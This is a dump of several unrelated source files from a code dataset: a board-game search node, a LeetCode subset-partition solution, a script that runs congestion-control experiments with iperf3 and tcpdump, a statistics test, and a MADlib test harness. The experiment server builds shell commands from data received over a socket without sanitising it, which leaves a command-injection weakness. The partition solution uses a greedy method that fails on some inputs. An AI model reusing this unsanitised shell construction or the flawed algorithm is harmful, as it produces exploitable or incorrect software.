[-2, 2],\n [-2, 0]\n ]\n\n successors = []\n max_directions = 6\n\n for piece in self.state[\"players\"]:\n\n # same position but different tuple\n tmpPiece = piece + ()\n\n # if piece is on the goal then exit\n if tmpPiece in self.state[\"goals\"]:\n s = self._newNode(tmpPiece,\n transition_action=\"EXIT from \" + str(tmpPiece) + \".\")\n successors.append(s)\n continue\n\n # check position of next possible moves\n # one direction at a time, check both move and jump\n for i in range(max_directions):\n\n # by move\n # 1 step position in this direction\n check_move = (tmpPiece[0] + move[i][0],\n tmpPiece[1] + move[i][1])\n\n if (not (check_move in self.state[\"blocks\"] or\n check_move in self.state[\"players\"])) \\\n and utils.piece_valid(check_move):\n\n # if can reach this direction one step by move\n # create new node\n s = self._newNode(tmpPiece, check_move,\n transition_action=\"MOVE from \" + str(tmpPiece)\n +\n \" to \" + str(check_move) + \".\",\n )\n successors.append(s)\n else:\n # by jump (if 1 step move in this direction can not\n # be reached)\n # 2 step position in this direction\n check_jump = (tmpPiece[0] + jump[i][0],\n tmpPiece[1] + jump[i][1])\n\n if (not (check_jump in self.state[\"blocks\"] or\n check_jump in self.state[\"players\"])) and \\\n utils.piece_valid(check_jump):\n # if can reach this direction one step by jump\n # create new node\n s = self._newNode(tmpPiece, check_jump,\n transition_action=\"JUMP from \" + str(tmpPiece)\n + \" to \" + str(check_jump) + \".\",\n )\n successors.append(s)\n\n return successors\n\n def goal_test(self):\n \"\"\"\n determine if the current state is the goal state\n \"\"\"\n return len(self.state[\"players\"]) == 0\n\n def __str__(self):\n \"\"\"\n to string, will be invoked when printing the node\n \"\"\"\n\n state_board = {}\n\n for p in self.state[\"players\"]:\n state_board[p] = \"*p*\"\n\n for l in self.state[\"goals\"]:\n if l in state_board:\n state_board[l] = state_board[l] + \"*g*\"\n else:\n state_board[l] = \"*g*\"\n\n for o in self.state[\"blocks\"]:\n if o in state_board:\n state_board[o] = state_board[o] + \"*b*\"\n else:\n state_board[o] = \"*b*\"\n\n utils.print_board(state_board, message=self.transition_action + str(self.heuristic(self.state)), debug=True)\n\n return self.transition_action\n\n # make sure that when print a list, the __str__ will also be invoked\n # only for debug purpose\n __repr__ = __str__\n","sub_path":"Project2/HardCode2/node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":7085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"187003813","text":"class Solution:\n def canPartition(self, nums):\n n = len(nums)\n if n == 1:\n return False\n total = sum(nums)\n if total % 2 == 1:\n return False\n target = total // 2\n nums.sort(reverse=True)\n for i in range(n):\n tmp = 0\n for j in range(i, n):\n if tmp + nums[j] == target:\n return True\n elif tmp + nums[j] < target:\n tmp += nums[j]\n return False\n","sub_path":"416.Partition_Equal_Subset_Sum/Solution_python.py","file_name":"Solution_python.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461251636","text":"#!/usr/bin/env python3\nimport socket\nimport os, sys, time\nimport subprocess\nimport _thread as thread\nfrom yattag import Doc\nsys.path.append(\"../config/\")\nfrom setup import * \nfrom os import path\nfrom datetime import date\nimport datetime\n\nstart_server=0\nexp_count=0\nfilename=\"\"\np=1\nprint('Delete all files in '+data_dir)\ncmd = 'rm -rf '+data_dir+'/* '\nos.system(cmd) \n\nprint('1. exe_dir is ',exe_dir)\nprint('2. data_dir is ',data_dir)\nprint('3. result_dir is ',result_dir)\nprint('4. tmp_dir is ',tmp_dir)\n\nif not os.path.exists(data_dir+'/'):\n os.makedirs(data_dir+'/')\nif not os.path.exists(result_dir+'/'):\n os.makedirs(result_dir+'/')\nif not os.path.exists(tmp_dir+'/'):\n os.makedirs(tmp_dir+'/')\nif not os.path.exists(backup_dir+'/'):\n os.makedirs(backup_dir+'/')\n\nif(len(sys.argv)<2):\n print (\"Usage error: --#proto\")\n exit()\n# # server 2\nwww_name = 'mydata'\nsu = 'sudo'\n\nproto=sys.argv[1]\n\ntcp_cc_list = ['reno','cubic','bbr','vegas','westwood','exll','pcc']\n\nif tcp_cc_list.count(proto) > 0 :\n # cmd = 'python3 server_tcp_cc.py'\n # os.system(cmd)\n\n print('change tcp_congestion_control to '+proto)\n cmd = su+' sysctl -w net.ipv4.tcp_congestion_control='+proto\n os.system(cmd)\n\n # if proto == 'bbr': cmd=\n # else:\n\n result = subprocess.check_output(cmd, shell=True)\n temp_proto = result.decode(\"utf-8\") \n proto=temp_proto.split()[2]\n print(\"protocol is \"+proto)\n # exp_num = 0\n try:\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, 5000))\n while True:\n s.listen()\n conn, addr = s.accept()\n with conn:\n print('Connected by', addr[0],addr[1])\n while True:\n data = conn.recv(1024)\n if not data:\n break\n else:\n if(\"Can I start\" in data.decode(\"utf-8\")):\n decode_data = data.decode(\"utf-8\")\n decode_data_group = decode_data.split()\n print(decode_data_group)\n ClientState = decode_data_group[4]\n ClientIP = decode_data_group[5] # background|foreground\n ClientStreams = int(decode_data_group[6])\n exp_num=int(decode_data_group[7])\n finish_num=int(decode_data_group[8])\n x=\"%.0f\"%time.time()\n if(b\"download\" in data):\n filename=\"Server_\"+ClientIP+\"_\"+str(PORT)+\"_\"+addr[0]+\"_\"+str(addr[1])+\"_download_\"+str(ClientStreams)+\"_\"+str(ClientState)+\"_\"+str(x)+\"_\"+str(exp_num)+\".txt\"\n print(filename)\n if(b\"upload\" in data):\n filename=\"Server_\"+ClientIP+\"_\"+str(PORT)+\"_\"+addr[0]+\"_\"+str(addr[1])+\"_upload_\"+str(ClientStreams)+\"_\"+str(ClientState)+\"_\"+str(x)+\"_\"+str(exp_num)+\".txt\"\n print(filename)\n # TODO : run tcp_probe (sudo cat /proc/net/tcpprobe > data 2>&1)\n tcp_probe_filename = \"tcpprobe_\"+ClientIP+\"_\"+str(PORT)+\"_\"+addr[0]+\"_\"+str(addr[1])+\"_download_\"+str(ClientStreams)+\"_\"+str(ClientState)+\"_\"+str(x)+\"_\"+str(exp_num)+\".txt\"\n cmd_tcp_probe = su+\" cat /proc/net/tcpprobe > \"+data_dir+'/'+tcp_probe_filename+\" 2>&1\"\n subprocess.Popen(cmd_tcp_probe,shell=True)\n cmd=\"iperf3 -s -p \"+str(PORT)+\" -V -i \"+str(interval)+\" -f m > \"+tmp_dir+'/'+filename # run iperf3\n print (\"cmd is:\",cmd) \n subprocess.Popen(cmd,shell=True)\n conn.sendall(b\"yes\")\n #res=p.communicate()\n #print (res)\n print (data,\"\\tLaunched the command\")\n if(\"Done\" in data.decode(\"utf-8\")):\n print (\"Clinet is done with iperf\",data)\n exp_count+=1\n cmd=su+\" kill $(ps aux | grep iperf3 | awk {'print $2'} )\"\n print (\"cmd is:\",cmd)\n os.system(cmd)\n cmd_2=su+\" kill $(ps aux | grep tcpprobe | awk {'print $2'} )\"\n print (\"cmd is:\",cmd_2)\n os.system(su+' killall -9 cat')\n os.system(cmd_2)\n #create the parsed output\n write_file=\"p\"+filename\n cmd=\"./server_parser.py \"+tmp_dir+'/'+filename+\" \"+str(interval)+\" \"+data_dir+'/'+write_file\n print (\"cmd is:\",cmd)\n os.system(cmd)\n #break\n #exit() \n if finish_num==1:\n print('finish_num is ', finish_num)\n p = 0\n else:\n print(data) \n if p==0:\n print('p==0')\n break\n \n except KeyboardInterrupt:\n pass \n\n # run = exp_count + 1\n print('\\n Stop Here! Total experiment number: '+ str(exp_count))\n print('Working on plot and index.html files.... wait....\\n')\n # sleep(10)\n # exp_count=2\n # run=2\n\n # draw with iperf3 and tcpprobe data\n cmd = 'python3 ' + exe_dir+'/' + 'plot_control.py '+str(duration)+' '+ClientState+' '+str(ClientStreams)+' '+str(exp_count)+' '+str(proto)\n print(\"cmd is \"+cmd)\n os.system(cmd)\n\n\nelse:\n # Sprout\n if proto == 'sprout':\n # run server\n # cmd = 'python3 run_sprout.py'\n # os.system(cmd)\n x=\"%.0f\"%time.time()\n rtt_filename=\"sprout_rtt_\"+str(today)+\"_\"+str(x)+\".txt\"\n tput_filename=\"sprout_tput_\"+str(today)+\"_\"+str(x)+\".txt\"\n\n cc_repo = path.join(base_dir, 'sprout')\n model = path.join(cc_repo, 'src', 'examples', 'sprout.model')\n src = path.join(cc_repo, 'src', 'examples', 'sproutbt2')\n # sproutbt2\n tmp_file_name = data_dir+'/'+rtt_filename\n rtt_command = src+' 2>&1 | tee ' +tmp_file_name\n print(rtt_command)\n p2 = subprocess.Popen(rtt_command, stderr = subprocess.PIPE, shell=True) \n s_time = \"%.0f\"%time.time()\n time.sleep(10)\n tput_cmd = su+' tcpdump -n udp -v > '+data_dir+'/'+tput_filename\n p1 = subprocess.Popen(tput_cmd, stderr = subprocess.PIPE, shell=True) \n c_time = \"%.0f\"%time.time()\n while(1):\n if int(c_time)-int(s_time) > duration+30 : # 15s: initial booting time \n os.system(su+' killall -9 tcpdump')\n os.system(su+' killall -9 cat')\n os.system(su+' killall -9 sproutbt2')\n # tar_cmp = 'tar -cvf '+'~/sprout.tar.gz '+data_dir+'/*'\n # os.system(tar_cmp)\n plot_file = '../client/new_plot_from_udp.py'\n new_result_dir = \"/\"+www_name+\"/www/html/tmp/\"+str(server_name)+\"_\"+str(proto)+\"_\"+str(today)+\"_\"+str(x)\n cmd = 'mkdir ' + new_result_dir\n os.system(cmd)\n dir_list = os.listdir(data_dir)\n # dir = dir_list[0]\n for dir in dir_list:\n if dir.find('tput') >= 0:\n tput = dir\n if dir.find('rtt')>=0:\n rtt = dir\n\n # python3 new_plot_from_udp.py readfilename filename(wrt) CCA_name\n cmd = 'python3 '+plot_file+' '+data_dir+'/'+tput+' '+data_dir+'/'+rtt+' '+data_dir+'/sprout_figure'+' '+'sprout'\n print(cmd)\n os.system(cmd)\n\n cmd = 'mv '+data_dir+'/* '+ new_result_dir \n os.system(cmd)\n\n break\n else:\n c_time = \"%.0f\"%time.time()\n # Verus\n elif proto == 'verus':\n # # run server\n # cmd = 'python3 run_verus.py'\n # os.system(cmd)\n x=\"%.0f\"%time.time()\n result_dir_name=\"verus_\"+str(today)+\"_\"+str(x)\n\n # ./verus_server -name test -p 60001 -t 30\n cc_repo = path.join(base_dir, 'verus')\n src = path.join(cc_repo, 'src', 'verus_server')\n verus_result_dir = path.join(src, result_dir_name)\n new_verus_result_dir = path.join(data_dir, result_dir_name)\n\n cmd = 'mkdir ' + new_verus_result_dir\n os.system(cmd)\n\n tput_filename=\"verus_tput_\"+str(today)+\"_\"+str(x)+\".txt\"\n rtt_filename=\"verus_rtt_\"+str(today)+\"_\"+str(x)+\".txt\"\n\n # rtt_cmd = src+' > '+data_dir+'/'+rtt_filename\n tput_cmd = su+' tcpdump -n udp -v > '+data_dir+'/'+result_dir_name+'/'+tput_filename\n print(tput_cmd)\n p1 = subprocess.Popen(tput_cmd, stderr = subprocess.PIPE, shell=True) \n\n s_time = \"%.0f\"%time.time()\n # verus_server result: Losses.out Receiver.out Verus.out\n rtt_command = src+' -name ' +result_dir_name +' -p 9001 -t '+ str(duration)\n p1 = subprocess.Popen(rtt_command, stderr = subprocess.PIPE, shell=True) \n\n duration_1 = int(duration) + 5\n time.sleep(duration_1)\n\n c_time = \"%.0f\"%time.time()\n while(1):\n if int(c_time)-int(s_time) > duration : # 15s: initial booting time \n os.system(su+' killall -9 tcpdump')\n # os.system(tar_cmp)\n break\n else:\n c_time = \"%.0f\"%time.time()\n\n time.sleep(15)\n cmd = 'cp ' +result_dir_name+'/* '+new_verus_result_dir\n os.system(cmd)\n\n verus_plot_file = '../client/plot_verus.py'\n cmd = 'python3 '+verus_plot_file+' '+new_verus_result_dir+'/Receiver.out -o '+new_verus_result_dir\n os.system(cmd)\n\n plot_file = '../client/new_plot_from_udp.py'\n dir_list = os.listdir(new_verus_result_dir)\n # dir = dir_list[0]\n print(dir_list)\n for dir in dir_list:\n if dir.find('verus_tput_')>= 0:\n tput = dir\n if dir.find('Receiver.out')>=0:\n rtt = dir\n\n # python3 new_plot_from_udp.py readfilename filename(wrt) CCA_name\n cmd = 'python3 '+plot_file+' '+new_verus_result_dir+'/'+tput+' '+new_verus_result_dir+'/'+rtt+' '+new_verus_result_dir+'/verus_figure '+proto\n print(cmd)\n os.system(cmd)\n\n new_result_dir = \"/\"+www_name+\"/www/html/tmp/\"+str(server_name)+\"_\"+str(proto)+\"_\"+str(today)+\"_\"+str(x)\n cmd = 'mkdir ' + new_result_dir\n os.system(cmd)\n\n cmd = 'mv '+new_verus_result_dir+'/* '+ new_result_dir \n os.system(cmd) \n\n\n #COPA\n elif proto == 'copa':\n # # run server\n # cmd = 'python3 run_copa.py'\n # os.system(cmd)\n x=\"%.0f\"%time.time()\n tput_filename=\"copa_tput_\"+str(today)+\"_\"+str(x)+\".txt\"\n rtt_filename=\"copa_rtt_\"+str(today)+\"_\"+str(x)+\".txt\"\n\n # rtt_cmd = src+' > '+data_dir+'/'+rtt_filename\n tput_cmd = su+' tcpdump -n udp -v > '+data_dir+'/'+tput_filename\n p1 = subprocess.Popen(tput_cmd, stderr = subprocess.PIPE, shell=True) \n # os.system(tput_cmd)\n s_time = \"%.0f\"%time.time()\n rtt_command = '~/genericCC/sender serverip='+HOST+' offduration=0 onduration=1000000 cctype=markovian delta_conf=do_ss:auto:0.5 traffic_params=deterministic > '+data_dir+'/'+rtt_filename\n p2 = subprocess.Popen(rtt_command, stderr = subprocess.PIPE, shell=True) \n # os.system(tput_cmd)\n # returned_value = os.system(rtt_command)\n # print('returned value:', returned_value)\n c_time = \"%.0f\"%time.time()\n while(1):\n if int(c_time)-int(s_time) > duration+5 : # 15s: initial booting time \n os.system(su+' killall -9 sender')\n os.system(su+' killall -9 tcpdump')\n # tar_cmp = 'tar -cvf '+'~/copa.tar.gz '+data_dir+'/*'\n # os.system(tar_cmp)\n time.sleep(10)\n\n plot_file = '../client/new_plot_from_udp.py'\n dir_list = os.listdir(data_dir)\n # dir = dir_list[0]\n print(dir_list)\n for dir in dir_list:\n if dir.find('tput')>= 0:\n tput = dir\n if dir.find('rtt')>=0:\n rtt = dir\n\n # python3 new_plot_from_udp.py readfilename filename(wrt) CCA_name\n cmd = 'python3 '+plot_file+' '+data_dir+'/'+tput+' '+data_dir+'/'+rtt+' '+data_dir+'/copa_figure '+proto\n print(cmd)\n os.system(cmd)\n\n new_result_dir = \"/\"+www_name+\"/www/html/tmp/\"+str(server_name)+\"_\"+str(proto)+\"_\"+str(today)+\"_\"+str(x)\n cmd = 'mkdir ' + new_result_dir\n os.system(cmd)\n\n cmd = 'mv '+data_dir+'/* '+ new_result_dir \n os.system(cmd) \n # cmd = 'rm '+data_dir+'/* '\n # os.system(cmd) \n break\n else:\n c_time = \"%.0f\"%time.time()\n\n # cmd = 'rm -rf ../../data/*'\n # os.system(cmd)\n #C2TCP\n elif proto == 'c2tcp':\n # # run server\n # cmd = 'python3 run_c2tcp.py'\n # os.system(cmd)\n cmd = su+' sysctl -w net.ipv4.tcp_congestion_control=cubic'\n os.system(cmd)\n cmd = su+' sysctl -w net.ipv4.tcp_c2tcp_enable=1'\n os.system(cmd)\n x=\"%.0f\"%time.time()\n tput_filename=\"c2tcp_\"+str(today)+\"_\"+str(x)+\".txt\"\n\n tcp_probe_filename = \"tcpprobe_0.0.0.0_00000_\"+str(HOST)+\"_\"+str(PORT)+\"_download_1_foreground_\"+str(x)+\"_0.txt\"\n cmd_tcp_probe = su+\" cat /proc/net/tcpprobe > \"+data_dir+'/'+tcp_probe_filename+\" 2>&1\"\n p0 = subprocess.Popen(cmd_tcp_probe,shell=True)\n\n # rtt_cmd = src+' > '+data_dir+'/'+rtt_filename\n tput_cmd = su+' tcpdump -n -v > '+data_dir+'/'+tput_filename\n p1 = subprocess.Popen(tput_cmd, stderr = subprocess.PIPE, shell=True) \n\n rtt_command = su+' ~/c2tcp/server '+str(PORT)+' 0 200 1000'\n p2 = subprocess.Popen(rtt_command, stderr = subprocess.PIPE, shell=True) \n print('duration is '+ str(duration))\n print('before_duration '+ str(duration))\n print(datetime.datetime.now())\n\n time.sleep(duration)\n print('after_duration '+ str(duration))\n print(datetime.datetime.now())\n os.system(su+' killall -9 server')\n os.system(su+' killall -9 tcpdump')\n os.system(su+' killall -9 cat')\n\n time.sleep(40)\n \n plot_file = '../client/new_plot_from_tcp.py'\n dir_list = os.listdir(data_dir)\n # dir = dir_list[0]\n tcpprobe = ''\n for dir in dir_list:\n if dir.find('c2tcp_2020') >= 0 and dir.find('Cell') < 0 :\n tput = dir\n elif dir.find('tcpprobe_') >= 0 and dir.find('png') < 0 :\n tcpprobe = dir\n\n # cmd = 'python3 '+plot_file+' '+new_result_dir+'/'+dir+' '+ new_result_dir+'/figire'\n # os.system(cmd)\n\n # python3 new_plot_from_udp.py readfilename filename(wrt) CCA_name\n cmd = 'python3 '+plot_file+' '+data_dir+'/'+tput+' '+data_dir+'/'+tcpprobe+' '+data_dir+'/ '+proto\n print(cmd)\n os.system(cmd)\n\n if tcpprobe !='':\n print('python3 plot_tcp_other.py '+str(duration)+' foreground 1 1 '+str(proto))\n os.system('python3 plot_tcp_other.py '+str(duration)+' foreground 1 1 '+str(proto))\n os.system('mv ../../plot/* '+data_dir)\n new_result_dir = \"/\"+www_name+\"/www/html/tmp/\"+str(server_name)+\"_\"+str(proto)+\"_\"+str(today)+\"_\"+str(x)\n cmd = 'mkdir ' + new_result_dir\n os.system(cmd)\n\n cmd = 'mv '+data_dir+'/* '+ new_result_dir \n os.system(cmd) \n # cmd = 'rm '+data_dir+'/* '\n # os.system(cmd) \n cmd = su+' sysctl -w net.ipv4.tcp_c2tcp_enable=0'\n os.system(cmd)\n\n # while(1):\n # print(int(c_time)-int(s_time))\n # if int(c_time)-int(s_time) > duration + :\n # os.system(su+' killall -9 server')\n # os.system(su+' killall -9 tcpdump')\n # os.system(su+' killall -9 cat')\n\n # time.sleep(10)\n \n # plot_file = '../client/new_plot_from_tcp.py'\n # dir_list = os.listdir(data_dir)\n # # dir = dir_list[0]\n # tcpprobe = ''\n # for dir in dir_list:\n # if dir.find('c2tcp_2020') >= 0 and dir.find('Cell') < 0 :\n # tput = dir\n # elif dir.find('tcpprobe_') >= 0 and dir.find('png') < 0 :\n # tcpprobe = dir\n\n # # cmd = 'python3 '+plot_file+' '+new_result_dir+'/'+dir+' '+ new_result_dir+'/figire'\n # # os.system(cmd)\n\n # # python3 new_plot_from_udp.py readfilename filename(wrt) CCA_name\n # cmd = 'python3 '+plot_file+' '+data_dir+'/'+tput+' '+data_dir+'/'+tcpprobe+' '+data_dir+'/ '+proto\n # print(cmd)\n # os.system(cmd)\n\n # if tcpprobe !='':\n # print('python3 plot_tcp_other.py '+str(duration)+' foreground 1 1 '+str(proto))\n # os.system('python3 plot_tcp_other.py '+str(duration)+' foreground 1 1 '+str(proto))\n # os.system('mv ../../plot/* '+data_dir)\n # new_result_dir = \"/\"+www_name+\"/www/html/tmp/\"+str(server_name)+\"_\"+str(proto)+\"_\"+str(today)+\"_\"+str(x)\n # cmd = 'mkdir ' + new_result_dir\n # os.system(cmd)\n\n # cmd = 'mv '+data_dir+'/* '+ new_result_dir \n # os.system(cmd) \n # # cmd = 'rm '+data_dir+'/* '\n # # os.system(cmd) \n # cmd = su+' sysctl -w net.ipv4.tcp_c2tcp_enable=0'\n # os.system(cmd)\n # break\n # else:\n # c_time = \"%.0f\"%time.time()\n\n\n # # server 1\n if server_name == 'server_1':\n tar_cmp = 'tar -cvf '+'~/backup1.tar.gz '+new_result_dir+'/*'\n os.system(tar_cmp)\n\n cp_cmp = 'cp ~/backup1.tar.gz /mydata/www/html/tmp/'\n os.system(cp_cmp)\n\n # # server 2\n if server_name == 'server_2':\n tar_cmp = 'tar -cvf '+'~/backup2.tar.gz '+new_result_dir+'/*'\n os.system(tar_cmp)\n\n scp_cmd = id_rsa+' ~/backup2.tar.gz user@000.000.000.000:/mydata/www/html/tmp/'\n print(scp_cmd)\n os.system(scp_cmd)\n # # server 3\n elif server_name == 'server_3':\n tar_cmp = 'tar -cvf '+'~/backup3.tar.gz '+new_result_dir+'/*'\n os.system(tar_cmp)\n\n scp_cmd = id_rsa+' ~/backup3.tar.gz user@000.000.000.000:/mydata/www/html/tmp/'\n print(scp_cmd)\n os.system(scp_cmd)\n\n\n\nif multi == True and server_name == 'server_1':\n time.sleep(20)\n\n backup_tmp_folder_name_2 = '/mydata/www/html/tmp/' + server_name+'-'+str(today)+'-'+ str(x)+'-'+proto\n\n cmd = 'mkdir ' + backup_tmp_folder_name_2\n os.system(cmd)\n print(tcp_cc_list.count(proto))\n if tcp_cc_list.count(proto) <= 0 :\n tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup1.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=4'\n else:\n tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup1.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=3'\n print(tar_cmp)\n os.system(tar_cmp)\n\n # if tcp_cc_list.count(proto) <= 0 :\n # tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup2.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=4'\n # else:\n # tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup2.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=3'\n tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup2.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=3'\n print(tar_cmp)\n os.system(tar_cmp)\n \n # if tcp_cc_list.count(proto) <= 0 :\n # tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup3.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=4'\n # else:\n # tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup3.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=3'\n tar_cmp = 'tar -xvf '+'/mydata/www/html/tmp/backup3.tar.gz -C '+backup_tmp_folder_name_2+' --strip-components=3'\n print(tar_cmp)\n os.system(tar_cmp)\n\n cmd = 'rm /mydata/www/html/tmp/backup*'\n print(cmd)\n os.system(cmd)\n\n if proto == 'c2tcp' or proto == 'verus':\n cmd = 'rm -rf /mydata/www/html/tmp/server_1_'+str(proto)+'_*'\n print(cmd)\n os.system(cmd)\n","sub_path":"source/server/server_tcpfriend.py","file_name":"server_tcpfriend.py","file_ext":"py","file_size_in_byte":21122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34156093","text":"from Utils import rnd, rand, cliffsDelta\nimport sys\nsys.path.insert(1, \"../\")\n\n\ndef testCliffs():\n assert(False == cliffsDelta([8, 7, 6, 2, 5, 8, 7, 3], [8, 7, 6, 2, 5, 8, 7, 3]))\n assert(True == cliffsDelta([8, 7, 6, 2, 5, 8, 7, 3], [9, 9, 7, 8, 10, 9, 6]))\n t1, t2 = [], []\n for i in range(1, 1001):\n t1.append(rand())\n for i in range(1, 1001):\n t2.append(pow(rand(), 0.5))\n assert(False == cliffsDelta(t1, t1))\n assert(True == cliffsDelta(t1, t2))\n diff, j = False, 1.0\n while not diff:\n t3 = list(map(lambda x: x*j, t1))\n diff = cliffsDelta(t1, t3)\n print(\">\", rnd(j), diff)\n j = j*1.025\n \n\n\n","sub_path":"code/HW6/test/testCliffs.py","file_name":"testCliffs.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"434557675","text":"'''\nMADlibTemplateTestCase is a subclass of GPDBTestCase that provides basic\ncababilities to run a templated SQL statement with substitution rules.\n\nFor any list parameters passed as \"template_vars\" it will iterate through\nall combinations\nof parameters and generate a separate test case for each combination.\n'''\n\nfrom madlib.src.template.sql import MADlibSQLTestCase\nfrom madlib.src.template.lib import PSQL1\nfrom madlib.src.test_utils.get_dbsettings import get_dbsettings\nfrom madlib.src.test_utils.utils import call_R_script\nfrom tinctest import TINCTestLoader\nfrom madlib.src.test_utils.utils import biprint\n# from tinctest.lib import Gpdiff\nfrom madlib.src.test_utils.utils import relative_mean_squared_error\nfrom madlib.src.test_utils.utils import read_sql_result\nfrom madlib.src.test_utils.utils import parse_single_SQL_output\nfrom madlib.src.test_utils.utils import parse_single_R_output\nfrom madlib.src.template.gpdiff import Gpdiff1\nfrom madlib.src.template.class_utils import make_sure_path_exists\nfrom madlib.src.template.class_utils import get_env_flag\nfrom madlib.src.template.class_utils import get_ext_ans\nfrom madlib.src.template.class_utils import get_skip\nfrom madlib.src.template.class_utils import clean_dir\nfrom madlib.src.test_utils.utils import unique_string\nimport os\nimport re\nimport sys\nimport shutil\nimport time\n\n# ------------------------------------------------------------------------\n# Use environment variables to control the behavior:\n#\n# CREATE_CASE to create case files\n# CREATE_ANS to create answer files (mainly for input test cases)\n# DB_CONFIG to pick a database configuration from settings.dbsettings\n# ------------------------------------------------------------------------\n\nclass MADlibTestCase (MADlibSQLTestCase):\n \"\"\"\n Abstract class for running templated SQL, subclasses\n must define the template\n \"\"\"\n # The following variables should be provided by subclass\n sql_dir_head = \"sql_\" # store the sql command executed\n out_dir_head = \"result_\" # output folder\n ans_dir = \"expected\" # expected results\n template = None\n template_method = None # method name, controls the file name\n template_doc = \"\"\n template_vars = {}\n skip_file = None # \"skip.py\"\n skip = []\n create_ans_ = False\n create_case_ = False\n db_settings_ = get_dbsettings(\"MADlibTestCase\", \"madlib\")\n schema_madlib = db_settings_[\"schema_madlib\"]\n schema_testing = db_settings_[\"schema_testing\"]\n reserved_keywords_ = [\"incr_\", \"schema_madlib\", \"schema_testing\",\n \"dbname_\", \"port_\"]\n\n # whether to clean all dirs\n clean_dirs_ = False\n\n # If you want to use fiel names like \"linregr_input_test_{incr}\",\n # increse incr for every test, which is done in the super class\n # This number is used for file name\n # to avoid putting very long arguments in the file name\n incr_ = 0 # name is hard-coded\n\n # ----------------------------------------------------------------\n\n @classmethod\n def dbKind(cls):\n \"\"\"\n greenplum or postgres\n \"\"\"\n return cls.db_settings_[\"kind\"]\n\n # ----------------------------------------------------------------\n\n @classmethod\n def dbVers(cls):\n \"\"\"\n get the version number\n \"\"\"\n ## get the first 2 digits from version number.\n ## example if version returned is 4.3.0, this function\n ## returns \"4.3\" as a string\n m = re.search(r\"^(\\d+\\.\\d+)\", cls.db_settings_[\"version\"])\n return m.group(1)\n\n # -----------------------------------------------------------------\n\n @classmethod\n def _make_sure_path_exists(cls, path):\n make_sure_path_exists(cls, path)\n\n # -----------------------------------------------------------------\n\n @classmethod\n def _get_env_flag(cls, flag, origin=False):\n \"\"\"\n Get the environment variable for\n creating case or answer file\n \"\"\"\n return get_env_flag(cls, flag, origin)\n\n # -----------------------------------------------------------------\n\n @classmethod\n def _get_ext_ans(cls, flag):\n \"\"\"\n Get the environment variable for\n creating answer file using\n external script, which takes in\n parameters and compute the results\n \"\"\"\n return get_ext_ans(cls, flag)\n\n # ----------------------------------------------------------------\n\n @classmethod\n def _validate_vars(cls):\n \"\"\"\n To ensure that the usre provided template_vars\n does not contain the keywords\n \"\"\"\n if isinstance(cls.template_vars, dict):\n cls.template_vars = [cls.template_vars]\n elif isinstance(cls.template_vars, list):\n pass\n else:\n sys.exit(\"MADlib Test Error: template_vars must be \",\n \"a dict or an array of dict !\")\n for template_dict in cls.template_vars:\n if not isinstance(template_dict, dict):\n sys.exit(\"MADlib Test Error: template_vars must be \",\n \"a dict or an array of dict !!\")\n anyMatch = any(key in cls.reserved_keywords_\n for key in template_dict)\n if anyMatch:\n biprint(\"MADlib Test Error: template_vars should \",\n \"not use any of the following keywords:\")\n biprint(\", \".join(cls.reserved_keywords_))\n sys.exit(\"Testcase is stopping for \" + cls.__module__\n + \".\" + cls.__name__ + \" !\")\n return None\n\n # ----------------------------------------------------------------\n\n @classmethod\n def _get_skip(cls):\n \"\"\"\n Get skip list\n \"\"\"\n return get_skip(cls)\n\n # ----------------------------------------------------------------\n\n @classmethod\n def _write_params(cls, f, args):\n \"\"\"\n Write test parameters into the test case file\n \"\"\"\n for key in args:\n if (key not in cls.reserved_keywords_):\n f.write(\"-- @madlib-param \" + key + \" = \\\"\"\n + str(args[key]) + \"\\\"\\n\")\n return None\n\n # ----------------------------------------------------------------\n\n @classmethod\n def loadTestsFromTestCase(cls):\n \"\"\"\n @param cls The child class\n \"\"\"\n # Ensure we pickup the variables from our child class\n template = cls.template\n template_method = cls.template_method\n template_doc = cls.template_doc\n ## template_vars = cls.template_vars\n\n if template_method is None or template is None:\n # biprint(\"MADlib Test Error: \" + cls.__module__\n # + \".\" + cls.__name__ + \" !\")\n return []\n\n cls.create_case_ = cls._get_env_flag(\"CREATE_CASE\")\n cls.create_ans_ = cls._get_env_flag(\"CREATE_ANS\")\n (r_ans, r_script) = cls._get_ext_ans(\"R_ANS\")\n\n # validate cls template_vars\n cls._validate_vars()\n\n for template_dict in cls.template_vars:\n template_dict.update(\n schema_madlib=cls.db_settings_[\"schema_madlib\"],\n schema_testing=cls.db_settings_[\"schema_testing\"],\n dbname_=cls.db_settings_[\"dbname\"],\n port_=str(cls.db_settings_[\"port\"]))\n\n assert isinstance(template, str)\n assert isinstance(template_method, str)\n\n biprint(\"loading tests from test case\")\n\n source_file = sys.modules[cls.__module__].__file__\n source_dir = os.path.dirname(os.path.abspath(source_file))\n ans_dir = os.path.join(source_dir, cls.ans_dir)\n sql_dir = os.path.join(os.path.dirname(ans_dir),\n cls.sql_dir_head + cls.__name__)\n out_dir = os.path.join(os.path.dirname(ans_dir),\n cls.out_dir_head + cls.__name__)\n cls.ans_dir = ans_dir\n cls.sql_dir = sql_dir\n cls.out_dir = out_dir\n\n cls._make_sure_path_exists(sql_dir)\n cls._make_sure_path_exists(ans_dir)\n 